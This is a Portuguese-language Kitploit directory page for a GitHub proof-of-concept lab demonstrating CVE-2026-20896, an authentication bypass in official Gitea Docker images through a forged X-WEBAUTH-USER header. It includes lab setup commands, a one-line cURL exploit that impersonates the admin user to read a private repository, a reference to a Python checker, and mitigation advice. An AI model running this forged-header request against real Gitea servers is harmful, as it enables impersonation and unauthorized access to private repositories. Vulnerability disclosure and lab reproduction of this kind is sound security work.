Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-20896 — Laboratório de prova de conceito e scripts em Python/cURL que demonstram o CVE-2026-20896, uma burla de autenticação nas imagens oficiais do Gitea Docker através do cabeçalho X-WEBAUTH-USER. | Kitploit
Ferramentas/GitHubGitHub/yym8538/cve-2026-20896
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoAutenticaçãoLabs e Prática
GitHubyym8538/cve-2026-20896

CVE-2026-20896

Laboratório de prova de conceito e scripts em Python/cURL que demonstram o CVE-2026-20896, uma burla de autenticação nas imagens oficiais do Gitea Docker através do cabeçalho X-WEBAUTH-USER.

1há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

CVE-2026-20896: PoC de Bypass de Autenticação em Imagem Docker do Gitea

[!WARNING] Use este PoC apenas em um laboratório local ou contra um sistema que você está explicitamente autorizado a testar.

https://github.com/user-attachments/assets/b73af2fe-0e59-438b-80d6-be93fd75697b

Visão Geral

CVE-2026-20896 é um bypass de autenticação em imagens Docker oficiais do Gitea afetadas. Quando a autenticação por proxy reverso está habilitada, a configuração REVERSE_PROXY_TRUSTED_PROXIES = * gerada pela imagem permite que um cliente capaz de alcançar o backend do Gitea se passe por um usuário existente através do cabeçalho X-WEBAUTH-USER.

O laboratório cria um administrador chamado gitea-admin com uma senha aleatória e armazena CVE-2026-20896_AUTH_BYPASS_CONFIRMED no repositório privado gitea-admin/private-proof. A leitura desse arquivo sem conhecer a senha aleatória do administrador demonstra o bypass.

Versões Afetadas

CategoriaVersão
VulnerávelImagens Docker oficiais gitea/gitea ≤ 1.26.2
Primeira corrigida1.26.3
Recomendada1.26.4 ou posterior

A configuração vulnerável exige que a autenticação por proxy reverso esteja habilitada e que o backend do Gitea seja diretamente acessível, ou que um proxy upstream preserve o cabeçalho de identidade fornecido pelo atacante. Um contêiner de proxy reverso não é necessário para esta reprodução local.

Ambiente

# build
docker build -t cve-2026-20896-gitea-vuln .

# run
docker run -d --rm --name cve-2026-20896-gitea-vuln -p 127.0.0.1:3000:3000 cve-2026-20896-gitea-vuln

Aguarde alguns segundos para que o Gitea e o repositório de prova privado sejam inicializados.

PoC

cURL

curl -s -L -H "X-WEBAUTH-USER: gitea-admin" http://127.0.0.1:3000/gitea-admin/private-proof/raw/branch/main/proof.txt

A exploração bem-sucedida retorna CVE-2026-20896_AUTH_BYPASS_CONFIRMED.

Python

python poc.py http://127.0.0.1:3000

O script compara requisições não autenticadas, não administrativas e de administrador forjado e imprime VULNERABLE quando o bypass de autorização é confirmado. Requer Python 3.10 ou posterior e usa apenas a biblioteca padrão.

Impacto

  • Personificação de usuários do Gitea conhecidos ou passíveis de adivinhação
  • Acesso não autorizado a repositórios privados e recursos de usuários
  • Ações administrativas quando uma conta de administrador é personificada

Mitigação

  • Atualize para o Gitea 1.26.3 ou posterior; 1.26.4 ou posterior é recomendado.
  • Restrinja REVERSE_PROXY_TRUSTED_PROXIES a endereços de proxy confiáveis.
  • Impeça o acesso direto ao backend do Gitea e sobrescreva cabeçalhos de identidade fornecidos externamente.
  • Desabilite a autenticação por proxy reverso quando ela não for necessária.

Limpeza

docker stop cve-2026-20896-gitea-vuln

Referências

  • Gitea Security Advisory GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 and 1.26.4 release announcement
  • Gitea security fix PR #38151
Baixar ferramenta